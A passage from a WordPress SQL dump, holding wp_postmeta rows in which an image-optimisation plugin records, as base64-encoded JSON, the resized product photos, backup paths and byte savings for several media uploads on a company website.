mlkIjoxOTA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXJlc2luLXN5dGVtcy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXJlc2luLXN5dGVtcy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Vwb3h5LXJlc2luLXN5dGVtcy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MjE0OSwiaWQiOjE5MDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktcmVzaW4tc3l0ZW1zLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktcmVzaW4tc3l0ZW1zLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZXBveHktcmVzaW4tc3l0ZW1zLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUyMTUyLCJpZCI6MTkwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1yZXNpbi1zeXRlbXMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1yZXNpbi1zeXRlbXMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9lcG94eS1yZXNpbi1zeXRlbXMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTIxNTQsImlkIjoxOTA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXJlc2luLXN5dGVtcy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXJlc2luLXN5dGVtcy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Vwb3h5LXJlc2luLXN5dGVtcy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MjE1NywiaWQiOjE5MDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1yZXNpbi1zeXRlbXMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1yZXNpbi1zeXRlbXMtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9lcG94eS1yZXNpbi1zeXRlbXMtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTIxNTksImlkIjoxOTA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktcmVzaW4tc3l0ZW1zLTQ1MHgyNzYuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktcmVzaW4tc3l0ZW1zLTQ1MHgyNzYuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIyNzYiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZXBveHktcmVzaW4tc3l0ZW1zLTQ1MHgyNzYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUyMTYyLCJpZCI6MTkwNX1d'); 
INSERT INTO `wp_postmeta` VALUES (29022, 1904, 'wpfc_optimisation_reduction', '21956'); 
INSERT INTO `wp_postmeta` VALUES (29023, 1904, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgwLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTIxNjcsImlkIjoiMTkwNCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjgwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4MzAsInRpbWUiOjE0ODM1NTIxNzAsImlkIjoxOTA0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI4MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjgwOCwidGltZSI6MTQ4MzU1MjE3NCwiaWQiOjE5MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjgwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNTkzLCJ0aW1lIjoxNDgzNTUyMTc3LCJpZCI6MTkwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyODAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgyODAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTEwNTYsInRpbWUiOjE0ODM1NTIxODEsImlkIjoxOTA0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI4MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTYzLCJ0aW1lIjoxNDgzNTUyMTg0LCJpZCI6MTkwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyODAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyODAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgyODAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ2OCwidGltZSI6MTQ4MzU1MjE4OCwiaWQiOjE5MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjgwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NTAsInRpbWUiOjE0ODM1NTIxOTEsImlkIjoxOTA0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI4MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTcwNCwidGltZSI6MTQ4MzU1MjE5NSwiaWQiOjE5MDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyODAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyODAtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgyODAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjUwOSwidGltZSI6MTQ4MzU1MjE5OCwiaWQiOjE5MDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyODAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyODAtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgyODAtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjg3NSwidGltZSI6MTQ4MzU1MjIwMSwiaWQiOjE5MDR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29024, 1903, 'wpfc_optimisation_reduction', '20285'); 
INSERT INTO `wp_postmeta` VALUES (29025, 1903, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMyLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMyLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTIyMDYsImlkIjoiMTkwMyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MTMyLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4MjYsInRpbWUiOjE0ODM1NTIyMDksImlkIjoxOTAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzMi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzMi04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODEzMi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjcwOSwidGltZSI6MTQ4MzU1MjIxMywiaWQiOjE5MDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMyLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MTMyLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNDA1LCJ0aW1lIjoxNDgzNTUyMjE2LCJpZCI6MTkwM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxMzItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMyLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgxMzItMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6OTU4MywidGltZSI6MTQ4MzU1MjIyMCwiaWQiOjE5MDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MTMyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MjMsInRpbWUiOjE0ODM1NTIyMjQsImlkIjoxOTAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzMi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzMi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODEzMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTUzLCJ0aW1lIjoxNDgzNTUyMjI3LCJpZCI6MTkwM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxMzItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgxMzItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgxMzItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU5NSwidGltZSI6MTQ4MzU1MjIzMCwiaWQiOjE5MDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MTMyLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MTMyLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNTg4LCJ0aW1lIjoxNDgzNTUyMjM0LCJpZCI6MTkwM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzMi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzMi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODEzMi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTMzLCJ0aW1lIjoxNDgzNTUyMjM3LCJpZCI6MTkwM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzMi00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODEzMi00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODEzMi00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODcwLCJ0aW1lIjoxNDgzNTUyMjQwLCJpZCI6MTkwM31d'); 
INSERT INTO `wp_postmeta` VALUES (29026, 1902, 'wpfc_optimisation_reduction', '23065'); 
